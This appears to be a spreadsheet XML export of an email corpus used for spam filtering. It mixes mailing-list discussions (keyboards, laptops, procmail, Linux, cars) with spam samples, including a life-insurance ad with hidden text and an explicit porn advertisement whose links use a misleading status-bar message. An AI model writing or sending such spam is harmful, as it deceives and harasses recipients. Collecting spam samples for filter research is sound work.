 QDIxaAJAcJA6Ly93R1AuYiAGfR8hbTnwDeAn8yXAHyEvpRhQdwWgc3Qocy83AP8gpDIiMcALcAMg
 IqA30QQA+zGgImBjBzEikhMhAhAFwH8pJSVQNQAyMAeAERBBO0l/RJUAcCPANIAFwAnBJ/Ag/wEA
 KEE4c0zmJLIeojXrIKT/H3UkAB/4CFBISyXlSkUgqgtWX1drfVigAB4ANRABAAAASAAAADxEMTNG
 N0MwNTQ3RDcxRjRDQTQwNzMyN0E4MjUxMzYwMDE5Q0E5Q0BDSE9WTUFJTDEuY2hvLmNvcnAucnlh
 bmFpci5jb20+AAMAgBD/////CwDyEAEAAAAfAPMQAQAAAFoAAABTAGEAdgBlACAAdQBwACAAdABv
 ACAANwAwACUAMgA1ACAAbwBuACAAaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbAAgAGMAYQBsAGwA
 cwAhAC4ARQBNAEwAAAAAAAsA9hAAAAAAQAAHMN0ZcUhEUMIBQAAIMJPedUhEUMIBAwDeP59OAAAD
 APE/CQQAAB4A+D8BAAAADAAAAENveWxlLCBTZWFuAAIB+T8BAAAAXQAAAAAAAADcp0DIwEIQGrS5
 CAArL+GCAQAAAAAAAAAvTz1SWUFOQUlSL09VPUZJUlNUIEFETUlOSVNUUkFUSVZFIEdST1VQL0NO
 PVJFQ0lQSUVOVFMvQ049Q09ZTEVTAAAAAB4A+j8BAAAAFQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9y
 AAAAAAIB+z8BAAAAHgAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAuAAAAAwAZQAAAAAAD
 ABpAAAAAAB4AMEABAAAABwAAAENPWUxFUwAAHgAxQAEAAAAHAAAAQ09ZTEVTAAAeADhAAQAAAAcA
 AABDT1lMRVMAAB4AOUABAAAAAgAAAC4AAAADAAlZAQAAAAsAWIEIIAYAAAAAAMAAAAAAAABGAAAA
 AA6FAAAAAAAAAwBwgQggBgAAAAAAwAAAAAAAAEYAAAAAUoUAAFmUAQAeAHGBCCAGAAAAAADAAAAA
 AAAARgAAAABUhQAAAQAAAAUAAAAxMC4wAAAAAAMAuIEIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAA
 AAAAQAC6gQggBgAAAAAAwAAAAAAAAEYAAAAAYIUAAAAAAAAAAAAACwC9gQggBgAAAAAAwAAAAAAA
 AEYAAAAAA4UAAAAAAAADAMeBCCAGAAAAAADAAAAAAAAARgAAAAAQhQAAAAAAAAMAzoEIIAYAAAAA
 AMAAAAAAAABGAAAAABiFAAAAAAAACwDlgQggBgAAAAAAwAAAAAAAAEYAAAAABoUAAAAAAAALAOmB
 CCAGAAAAAADAAAAAAAAARgAAAACChQAAAAAAAAsAKQAAAAAACwAjAAAAAAADAAYQHr1S2QMABxB/
 AgAAAwAQEAsAAAADABEQAQAAAB4ACBABAAAAZQAAAFdJVEhPVVJURUxFQ09NU1BBUlRORVJCVU1C
 TEVCRUVET05UR0VUUklQUEVET0ZGQllFWFBFTlNJVkVIT1RFTCxQQVlQSE9ORUFORE1PQklMRUNI
 QVJHRVNTQVZFLFNBVkUsU0EAAAAAAgF/AAEAAABIAAAAPEQxM0Y3QzA1NDdENzFGNENBNDA3MzI3
 QTgyNTEzNjAwMTlDQTlDQENIT1ZNQUlMMS5jaG8uY29ycC5yeWFuYWlyLmNvbT4AEOQ=
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: text/plain; charset="us-ascii"
 Content-description: footer
 ---
 You are currently subscribed to customers as: zzzz-ryanair@spamassassin.taint.org
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[3]: Forged whitelist spam
</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;&gt; EL&gt; Yeah, I was thinking of the G4 keyboard when I wrote this. Otherwise ousy 
 &amp;&gt; EL&gt; feel and key placement, though. (That's why I'm holding on to
 &amp;&gt; EL&gt; My IBM Model M Space Saver. Once I get an PS2 to USB converter, I
 &amp;&gt; EL&gt; expect it will outlive several generations of computer hardware).
 The Fingerworks dvorty ergo keyboards are pretty good for that; unfold, plug
 the USB port and go, but you don't get the angle unless you put the castiron
 (sort of) bracket (and optional gel palm-rests) in your pack.  Big airport fun there.
 The flexi-PCB connecting the halves is probably only good for 100,000 flexes too.
 (The keyboard is $200-400, hence minor concern.)
 Kind of useless for keysigning though; is it not law that when you have to sign,
 you will be packed and ready to leave/arrive elsewhere?  Thats why F-u-F-mi
 is such a handy accessible proxy signing method and Dragon Naturally
 Authorized canceled its IPO.
 	Seriously, the nifty Palm thing where you enter your password
 and (or by) a series of naturally cryptic buttonpressed and screentaps is a
 good method.  Keyed steganography (&lt;---bad term! sorry) is it until I
 hear more about spoofed braille.
 [the below digresses to laptopianism]
 &amp;&gt; EL&gt; Very good for sticking in USB fobs into, though. CRTs/LCD panels are
  even &amp;&gt; EL&gt; better for that, though.
 The DPMS connector is supposed to do -what- again?
 &amp;&gt; &gt;&gt; near close to keyboard/usb connection as one can get, without the real
 &amp;&gt; &gt;&gt; thing)
 &amp;&gt; EL&gt; I think laptops are largely useless because of the battery and the
 &amp;&gt; EL&gt; keyboard issue.
 Once you get something to cut the backlight power low when not needed for
 image proofing (or off, in case of FLCD) and cache CDs as virtual devices,
 is battery life still bad?
 &amp;&gt; Dunno.. Some of the new Sonys (I'm hunting again for a lappy, as the
 &amp;&gt; Toshiba I have is a large piece of cow manure)  which promise a 4 hour
 &amp;&gt; battery life off of ONE battery are pretty damn impressive.  As far as
 &amp;&gt; the keyboard issue, the Toshiba actually came out with a good
 &amp;&gt; keyboard, nearly equivalent to most standard keyboards (Not ergonomic,
 &amp;&gt; alas, but I have a USB happy ergo keyboard I can always plug in if I
 &amp;&gt; get restless).   I can't imagine surviving at Law school without a
 &amp;&gt; lappy, but thats just me.
 Once used to being surrounded by lawyers with webcams,
 I cant imagine being flummoxed dealing with courts.
 Lots of the tabletPCs have daylight readable FLCDs.  (From looking
 at http://www.infocater.com  I don't know where you'll get Microsoft 
 Tablet OS though.)   An item from their handy pres. below.
 So after looking at Transmetazone, tell me where (also) stateside I'm 
 supposed to be\ shopping for the new Made-for-Japan laptops?
 The Sony U series is all Crusoe, but then TigerDirect will be all grins
 to sell you a lappad that gets you to 10h on a P4m...maybe a P4, who's to
 say Tulatin P4s can't do that massive multithreading trick.
 (Besides which, a brown cowpie-colored Dell 8200 with a 
 GeForce4Go400-32 is ca. $1550, before you buy car adapters 
 and firewire drives.  Popular in OpenGL law school.)
 Revamping the Sony C1 every year strikes me as a cruel joke though,
 and I don't know any tricks for using 1400x2800 virtual screens on
 the lovely NEC LaVie MX and Versa Daylite (FLCDs, 1 yr old) or
 Toshiba Libretto L5/080 knkw (the KW has 802.11b built in, maybe
 not as good as the 22MBps version or .a)
 &amp;&gt; then again, I don't know what you do with your laptops, Gene :)
 ----8&lt; ---ancillary.bar: disclaimer: Before the dollar fell below the euro.
  Return-Path: &lt;gpalmer@infocater.com&gt;  
 Dear Steve,
 Thank you for your inquiry regarding the Tablet PC's. 
 InfoCater is a Tablet Computer Value Added Reseller and Systems Integrator that specializes in wireless tablet computers. 
 We provide:
 &gt; hardware selection expertise
 &gt; software application evaluation, specification, implementation and delivery
 &gt; extensive hands-on experience with all forms of touch screen and Tablet Computers.
 We work with you the way you prefer. 
 We will listen to your needs, recommend the appropriate tablet, accessories and software, and be available to assist you as desired to make your project a success! Our services include product selection, consulting, training, implementation and custom development. 
 We carry the complete line of Tablet PC's tablets and accessories.
 We have software solutions that you may find interesting, and even have Bluetooth products to eliminate cables to printers, mobile phones, bar code scanners, and other devices.
 Please let us know your exact specifications and the environment you will be using your tablets.
 Please visit http://www.infocater.com and select "specs" at the top of the page for more information and PDF files on our products and services.
 Some other details:
 Communicating:
 We strive to make it easy for you to communicate with is, using whatever method you prefer.
 Phone: 
 You can call me at 617.969.6853 anytime it's convenient for you and we can discuss further. If you get a voice mail message, we apologize and if you leave your phone number and a convenient time to return the call we will get back to you as soon as possible. 
 Email:
 Email also works well. Please Email gpalmer@infocater.com 
 Shipping:
 The Tablet PC's and accessories are available for same day shipping. 
 If you require a custom configuration, it will take a few weeks to get built to your specification. 
 The shipping charges are based on the speed of service that you require. We insure all shipments
 Payment: 
 We accept payment by credit card, purchase order or wire transfer, as you prefer. 
 We look forward to working with you and serving your tablet computer needs.
 Regards,
 Geoff
 Geoffrey Palmer
 President
 InfoCater, Inc. 
 14 Buswell Park
 Newton, MA 02458
 Email: gpalmer@infocater.com 
 WWW: http://www.infocater.com
 Phone: 617-969-6853
 Fax: 508-448-8375 
 IM: Yahoo: infocater AOL: infocaterinc 
 --------------------------------------------------------------------------------------------------------------------------------------------
 Product Information:
 ViewSonic ViewPad 1000 Tablet PC - SAME DAY SHIPPING AVAILABLE
 The ViewPad 1000 is a full function PC featuring a 10.0 GB hard drive, an 800 MHz Intel Celeron processor and Microsoft Windows 2000 Professional operating system, all in an easy-to-use tablet design. Built for connectivity, the ViewPad 1000 come equipped with built-in WAN, LAN, and WiFi (802.11b) wireless LAN connectivity, giving users network access in nearly any environment. This innovative device gives users mobile access to information, captures, sends and receives live images (it's got a built-in digital camera), and shares information of all kinds for a rich multimedia viewing experience. 
 The 10.4 inch high-resolution touch screen makes for easy navigation with the touch of a finger or stylus. Accessories such as a docking station are also available. 
 The price for the Microsoft Windows 2000 Professional based ViewSonic ViewPad 1000 is $1975. The optional docking station costs $299.
 Microsoft Internet Explorer 5.0, Microsoft Outlook Express, Microsoft NetMeeting, Microsoft Windows Media player, Adobe Acrobat Reader, handwriting recognition and a virtual keyboard are included.
 The unit has an 10.4 inch 800 x 600 High Luminance SVGA resistive touch screen display that can be used either in portrait or landscape mode, 128 MB RAM (expandable to 512MB), a 10 GB hard disk drive, two USB ports, an open type II PCMCIA slot, an infrared wireless keyboard port (keyboard included) and an infrared data port. In addition, a VGA port is available for an external monitor at up to 1024x768. The ViewPad 1000 is powered by a 800 MHz Intel Mobile Celeron.
 --------------------------------------------------------------------------------------------------------------------------------------------
 Fujitsu Stylistic 3500 and LT-P600: 
 The Fujitsu Stylistic 3500 and LT-P600 products are available in several configurations depending on disk, screen, memory capacity and wireless options. The prices range from $3559 to $3859 and offer the choice of Windows 2000 or Windows 98. The screen options include models for indoor, outdoor or both indoor and outdoor use. Screen resolution options are 800x600 or 1024x768. These products are built to your specific configuration and usually take about two weeks to deliver. 
 --------------------------------------------------------------------------------------------------------------------------------------------
 ViewSonic ViewPad 100 Super PDA - SAME DAY SHIPPING AVAILABLE
 The ViewPad 100 Super PDA enables you to access important applications and data from virtually anywhere. Not only is information easy to get (with options added to the included PC Card and CompactFlash slots), but it's also easy to keep organized by synchronizing the ViewPad 100 to a PC. You can also access server-based applications remotely with the provided Citrix ICA or Microsoft's RDP software. 
 The price for the Microsoft Windows CE 3.0 based ViewSonic ViewPad 100 is $1225. The cradle is an additional $129. The unit features a PCMCIA slot and a CF slot which enable you to insert either a 802.11b WLAN card or a cellular based WAN card (not included).
 Internet Explorer 4.0 with Java Virtual Machine and Macromedia Flash support are included, as are viewers for many types of files, PTab Spreadsheet software (Microsoft Excel compatible), Citrix ICA 6.0 and Microsoft RDP 5.0, Microsoft Inbox, Microsoft Pocket Word, PowerPoint, Pocket On-Schedule and Primer PDF Viewer. 
 The unit features Microsoft ActiveSync, handwriting recognition software, and a virtual keyboard.
 The unit has an 10 inch 800 x 600 High Luminance SVGA resistive touch screen display that can be used either in portrait or landscape mode, 128 MB RAM and 32MB Flash, one USB port, an open type II PCMCIA slot and an open type II CompactFlash slot . In addition, a VGA port is available for an external monitor at up to 1024x768. The ViewPad 100 is powered by a 206 MHz Intel StrongARM SA-1110.
 --------------------------------------------------------------------------------------------------------------------------------------------
 Honeywell WebPAD II - SAME DAY SHIPPING AVAILABLE
 The Honeywell WebPad II is an information appliance with wireless high speed connection to the Internet that enables you to surf the web, send and receive email, and enter information via a pop-up touch screen keyboard. 
 The price for the Microsoft Windows CE 3.0 based Honeywell WebPad II with integrated 802.11b wireless card, cradle and power supply is $1625. Microsoft Internet Explorer 4.0 with Java Virtual Machine and Macromedia Flash support are included, as are viewers for many types of files, Citrix ICA and Microsoft RDP, Microsoft Windows Media player, Microsoft Inbox and Microsoft Pocket Word. 
 The unit has an 10 inch 800 x 600 TFT active matrix touch screen SVGA display with pop-up keyboard, 64 MB RAM and 32MB Flash, one USB port and an open type II CompactFlash slot. The unit is powered by a National Semiconductor 300 MHz Geode GS1 processor. 
 If you do not have an 802.11b access point, I recommend the Dlink DI-713P which costs $250.
 --------------------------------------------------------------------------------------------------------------------------------------------
 FIC AquaPAD - SAME DAY SHIPPING AVAILABLE
 AquaPAD combines the functionality and power of a cumbersome notebook with the convenience and simplicity of a PDA. This compact handheld Internet appliance offers high-speed wireless Internet access and can communicate with Bluetooth-enabled devices. With its two USB inputs, a PCMCIA Type II slot, and a Compact Flash slot, there is truly no limit to AquaPAD's functionality. Additionally, AquaPAD comes loaded with Windows CE and a full suite of utilities, including MS Word. The AquaPAD features a complete, highly rich, multimedia capability. With AquaPAD, the ability to surf the web, read a book, listen to a MP3, or watch a MPEG movie is right in the palm of your hand-literally!
 Whether you need to access a local network or the Internet, the AquaPAD is the only solution to provide the power and capability to harness all the possibilities of wireless.
 When it comes to performance, the AquaPAD takes no prisoners. The AquaPAD offers an incredibly fast 500MHz Transmeta Crusoe 5400 processor coupled with 128MB of SDRAM memory-so you'll have all the power you need. Plus, with the Crusoe's special energy saving design, you'll enjoy up to 3+ hours of battery life. The AquaPAD comes loaded with MS Windows CE -and all of the functionality that comes with them. Plus, with our suite of utilities, the AquaPAD is immediately ready to get down to business.
 Windows CE 3.0, Windows 2000*, Windows Me* and Linux versions available!
 The FIC AquaPAD is $1,399 with a Cisco 802.11b wireless card with your choice of CE or Linux.
 * Optional IBM 1GB Microdrive required for Windows 2000 ($499) or Windows Me($399).
 Spare batteries are $139, and a cradle that can charge both the AquaPAD and a second battery is $79.
 --------------------------------------------------------------------------------------------------------------------------------------------
 Siemens SIMpad SL4 - SAME DAY SHIPPING AVAILABLE
 The Siemens SIMpad SL4 includes a brilliant color TFT touchscreen which shows a complete HTML page, recognizes handwriting, is PC Card enabled, uses Windows CE, and links effortlessly and wirelessly in just ten seconds to the web or to your LAN. This ligheweight tablet features an 8.4" TFT touchscreen, SVGA (800 x 600 pixel), 16 bit colors (65536 colors), photo quality display. The proccessor is an Intel StrongARM 1110, 206 MHz 32-bit RISC. There is a PC-Card-Slot, RS-232, IrDA, SmartCard, headset connection and a Li-Ion battery. There is 64MB RAM and 32 MB Flash. The operating system is Microsoft Windows CE 3.0 for Handheld PC 2000. The software included in the standard package is MS Internet Explorer 4.0 for HPC, MS Pocket Outlook (Inbox, Tasks, Calendar, Contacts), MS Pocket Office (Word, Excel, Powerpoint, Access), MS Pocket Paint, Jot handwriting recognition, Java Virtual Machine, Terminal Server Client, Electronic Notebook, Calculator, Games, Macromedia Flash player, Virtual Keyboard. The standard package inclused the SIMpad SL4, AC adapter, power cable, serial cable, stylus pens, software CD-ROM, manuals for $1495, and a cradle with charger is $70.
 --------------------------------------------------------------------------------------------------------------------------------------------
 Fujitsu PenCentra 200: 
 The Fujitsu PenCentra products are available in several configurations depending on the operating system, wireless and screen selections. The prices range from $1500-1600 and offer the choice of Windows CE or Windows CE H/PC 2000. The screen options include models for indoor or outdoor use. Screen resolution is 640x480. These products are built to your specific configuration and usually take about two weeks to deliver. 
 --------------------------------------------------------------------------------------------------------------------------------------------
 Advantech MobiPanel 100
 InfoCater proudly introduces its first ruggedized web tablet, the MobiPanel 100, a portable wireless Windows CE-based appliance combining data capture and communication technology. The MobiPanel 100 is designed to provide mobile professionals a real time wireless solution to access information from remote databases via the Internet or an Intranet. The MobiPanel 100 is ideal for applications in retail, healthcare, warehousing, home networking, manufacturing process monitoring, hospitality, logistic support and on-site service. This is essentially a ruggedized version of the ViewSonic ViewPad 100 with an integrated 802.11 wireless card and antenna.
 The I/O ports, LCD panel and internal circuitries of the MPC-100 have been designed to resist spill and water damage. The product is dust-resistant with protected LCD, sealed ports and card slots for protection against unexpected accidents and damages. These features have been approved by the IP53 standard.
 The I/O ports, LCD panel and internal circuitries of the MPC-100 have been designed to resist spill and water damage. The product is dust-resistant with protected LCD, sealed ports and card slots for protection against unexpected accidents and damages. These features have been approved by the IP53 standard.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 23 Aug 2002 10:58:20 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030550301.a24bc5@DeepEddy.Com&gt;
     Message-ID:  &lt;1030118301.3993.TMDA@deepeddy.vircio.com&gt;
   | Interesting...I don't think this was my bug.
   | It appears that Msg_Change was asked to change to message "-".
 Something like that is quite possible, but perviously typing nonsense
 in didn't cause tracebacks, and now it does, and the traceback came
 from the sequence code...
 Perviously this would have just caused red messages in the status
 line complaining about my lousy typing.   That's probably what it
 should keep on doing (the "red" part isn't important obviously..)
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] help with postfix + spamassassin
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Folks,
 I have just installed spamassassin 2.31 in my postfix MTA server.
 At first, I would like to test it just in my email account before 
 applying it to the wole site.
 I configured just as in the INSTALL file:
 	5. Create a .forward...
 	"|IFS=' ' &amp;&amp; exec /usr/bin/procmail -f- || exit 75 #user"
 	6. create a .procmailrc
 	:0fw
 	| /usr/bin/spamassassin -c 
 			/etc/mail/spamassassin/rules
 But the spams get trought it untouched. When I run it by the hand:
 cat sample-spam.txt | /usr/bin/spamassassin -c 
 				/etc/mail/spamassassin/rules
 it does tag it as spam and send me the email.
 what should I look at?
 Thank you,
 -- 
 Luiz Felipe Ceglia 	-  Staff TereNet
 lceglia@terenet.com.br	-  +55-21-9135-3679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</si>
  <si>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On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute wrote:
 &gt; Rick Moen &lt;rick@linuxmafia.com&gt; wrote:
 &gt; 
 &gt; &lt;snip&gt;
 &gt; &gt; Don't like SuSE's product licensing?  Write your own distribution.  You
 &gt; &gt; can even grab most of what you need _from SuSE_.  All you have to do is 
 &gt; &gt; heed the licensing terms on the individual pieces.
 &gt; &lt;snip&gt;
 &gt; 
 &gt; How unimaginably difficult is this to do?
 It shouldn't be too hard.  Red Hat, for example, ships with everything
 you need to build a modified distribution.  And it's all GPL (or free
 enough).
 &gt; There are as far as I know, no Linux kernel hackers, 
 Ahem.  There are more than one.
 &gt; nor distros 
 &gt; that originate from this fair island right?
 &gt; Right.
 &gt; 
 &gt; Yes it might be very,very difficult and subject to abject failure 
 &gt; in sticking together a distro.... call it Dolmen Linux (or other), 
 &gt; no doubt the packaging system would be one of the first places
 &gt;  such a suggestion would stumble.
 &gt; Some (like me) favouring a FreeBSD style ports system others favouring
 &gt;  a Debian style system and others still favouring *rpm style packaging.
 &gt; 
 &gt; That said other *LUG have done interesting things like making blackbox.
 &gt; 
 &gt; Perhaps making a distro would be ..... umm.... fun.
 There was talk of this in the past.  Taking a regular distribution like
 Red Hat or Debian and tweaking it for Ireland - things like translations,
 ISP setups, default bookmarks.
 Never took off.
 Why not try it yourself.
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Life Insurance Price Wars 8870Hgdg0-306fFSQ8613J-21
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;font color="#FFFFFF"&gt;&lt;i&gt;It costs nothing!&lt;/i&gt;&lt;/font&gt;
 &lt;BODY TEXT="#000000" LINK="#0000ff" BGCOLOR="#ffffff"&gt;
 &lt;FONT SIZE=5&gt;&lt;STRONG&gt;&lt;P ALIGN="CENTER"&gt;TOP Life Companies Continue to Slash Rates&lt;/FONT&gt;&lt;/STRONG&gt;&lt;FONT FACE="Arial" SIZE=2&gt; &lt;/P&gt;
 &lt;/FONT&gt;&lt;FONT SIZE=5&gt;&lt;STRONG&gt;&lt;P ALIGN="CENTER"&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;Save&lt;/i&gt;&lt;/font&gt; up to 70% on your LIFE INSURANCE today! &lt;/P&gt;
 &lt;/STRONG&gt;&lt;/FONT&gt;&lt;P ALIGN="CENTER"&gt;&lt;a HREF="http://www.all-life-ins.com/E72127.htm"&gt;&lt;I&gt;&lt;FONT FACE="Verdana"&gt;Term Insurance Comparisons&lt;/I&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/a&gt;&lt;FONT FACE="Verdana" SIZE=2&gt; &lt;/P&gt;
 &lt;/FONT&gt;&lt;P ALIGN="CENTER"&gt;&lt;a HREF="http://www.all-life-ins.com/E72127.htm"&gt;&lt;I&gt;&lt;FONT FACE="Verdana"&gt;Permanent (Whole/Universal) Life&lt;/I&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/a&gt;&lt;FONT FACE="Verdana" SIZE=2&gt; &lt;/P&gt;
 &lt;/FONT&gt;&lt;P ALIGN="CENTER"&gt;&lt;a HREF="http://www.all-life-ins.com/E72127.htm"&gt;&lt;I&gt;&lt;FONT FACE="Verdana"&gt;Burial/Final Expense&lt;/FONT&gt;&lt;/I&gt;&lt;/a&gt; &lt;/P&gt;
 &lt;P ALIGN="CENTER"&gt;&lt;font face="Verdana" size="4"&gt;&lt;u&gt;&lt;b&gt;&lt;a href="http://www.all-life-ins.com/E72127.htm"&gt;Get
 a Quote Here!&lt;/a&gt;&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; &lt;/P&gt;
 &lt;P ALIGN="CENTER"&gt;&lt;FONT FACE="Arial"&gt;Choose&lt;/FONT&gt; &lt;FONT FACE="Arial"&gt;the coverage that &lt;/P&gt;
 &lt;B&gt;&lt;EM&gt;&lt;P ALIGN="CENTER"&gt;Bests suits YOUR needs.&lt;/B&gt;&lt;/FONT&gt;&lt;/EM&gt;&lt;FONT FACE="Verdana" SIZE=2&gt; &lt;/P&gt;
 &lt;/FONT&gt;&lt;B&gt;&lt;EM&gt;&lt;P ALIGN="CENTER"&gt;Quotes from over 300 top rated companies &lt;/P&gt;
 &lt;P ALIGN="CENTER"&gt;&lt;/EM&gt;&lt;/B&gt;&lt;FONT FACE="Verdana" SIZE=2&gt; &lt;/P&gt;
 &lt;P ALIGN="CENTER"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/FONT&gt;
 &lt;p align="center"&gt;&lt;font size="1"&gt;We don't want anyone to receive correspondence
 who does not wish too.&amp;nbsp; Just go to &lt;a href="http://www.all-life-ins.com/stopit.htm"&gt;http://www.all-life/stopit&lt;/a&gt;
 and you will not get any mail from us in the future.&lt;/font&gt;&lt;/p&gt;
 &lt;FONT FACE="Arial" SIZE=2&gt;&lt;P&gt;. &lt;/P&gt;
 &lt;/FONT&gt;&lt;/BODY&gt;
 &lt;/HTML&gt;
 11l2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</si>
  <si>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Mercedes-Benz G55
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-12-01 at 21:01, Geege Schuman wrote:
 &gt; Best bang for the buck:  390 hp Mustang Cobra @ $35k.
 &gt; 
 &gt; GG, recently emerged from the passenger side of a 2003 with the largest
 &gt; smile.
 If only they weren't the ugliest things Ford has ever produced, in a
 long and distinguished history of ugly.
 Luis [former owner of a recent-model mustang and hence allowed to talk]
 P.S. You can get an RSX Type S with 200hp for $23K. I have not yet
 driven an RSX, but if it's anything like a late model Integra, it will
 kick the ass of the Mustang in anything that requires you to actually
 move the steering wheel from the center position.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Joseph S. Barrera III
 &gt; Sent: Sunday, December 01, 2002 1:40 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: Mercedes-Benz G55
 &gt; 
 &gt; 
 &gt; On the other end of the spectrum, I just bought a Honda del Sol
 &gt; for my new commute to San Jose (from San Bruno)... I wonder if
 &gt; it would fit in the cargo area of a G55.
 &gt; 
 &gt; - Joe
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The problem is that politics have gotten so muddied
 &gt; nowadays, that shouting down and unpeaceably disrupting
 &gt; political rallies that you don't agree with has become
 &gt; common practice.  The courts have constantly ruled
 &gt; that there are some restrictions on the first amendment.
 &gt; They teach you that your very first year of law school.
 &gt;
 I don't think politics is any muddier. People are becoming increasingly
 unethical. It's a breakdown in home training.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $15,000 umbrella stand: nothing exceeds like excess
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541081
 Date: Not supplied
 Teresa's written a wonderful blog post about the revelation that Tyco's crooked 
 CEO spent "6,000 on a shower curtain, $15,000 for an umbrella stand, $2,900 on 
 coat hangers, $5,960 on bedsheets and $2,200 for a wastebasket." 
     Naturally, they assured her that not only is it possible to pay $6,000 for 
     your shower curtains and $2,200 for a wastebasket, it's a Good Thing to do 
     so, practically essential. Then they explain how: 
     "Sometimes the wastebasket is exposed," said Joel Joves, a designer with 
     offices in Rancho Santa Fe and Beverly Hills. "If you have a fabulous study 
     or master bedroom, then maybe we need a pewter-finished basket with 
     decorative pearl beadings or semiprecious stones to complete the look of a 
     room." 
     That's Fool Money at work. If you can't find a sufficiently fabulous 
     wastebasket for $200, $500 absolute tops, you're not half trying.  
 Link[1] Discuss[2]
 [1] http://nielsenhayden.com/makinglight/archives/2002_10.html#001484
 [2] http://www.quicktopic.com/boing/H/mUp57FGXT7VJ
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BIG NATURAL TITTIES!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Big and big&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type
 content="text/html; charset=windows-1252"&gt;&lt;HTTP-EQUIV="PRAGMA"
 CONTENT="NO-CACHE"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=#eaebec vLink=#ffffcc aLink=#ffffff link=#ffffcc bgColor=#647481
 leftMargin=0 background="http://www.jeweldive.com:81/nsi/big/bg.jpg"
 topMargin=0&gt;
 &lt;CENTER&gt;
   &lt;CENTER&gt;
     &lt;CENTER&gt;
       &lt;FONT face=verdana&gt;&lt;BR&gt;
       &lt;/FONT&gt;
       &lt;CENTER&gt;
         &lt;TABLE cellPadding=15 bgColor=wheat&gt;
           &lt;TBODY&gt;
           &lt;TR&gt;
             &lt;TD&gt;
               &lt;CENTER&gt;
                 &lt;font color="maroon" face="verdana"&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;IMG
       src="http://www.jeweldive.com:81/nsi/big/2.jpg" border=0&gt;&lt;/A&gt;&lt;BR&gt;
                 &lt;/font&gt;&lt;FONT color=maroon&gt;
                 &lt;TABLE cellSpacing=24&gt;
                   &lt;TBODY&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-009.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-007.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-054.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-083.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-150.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
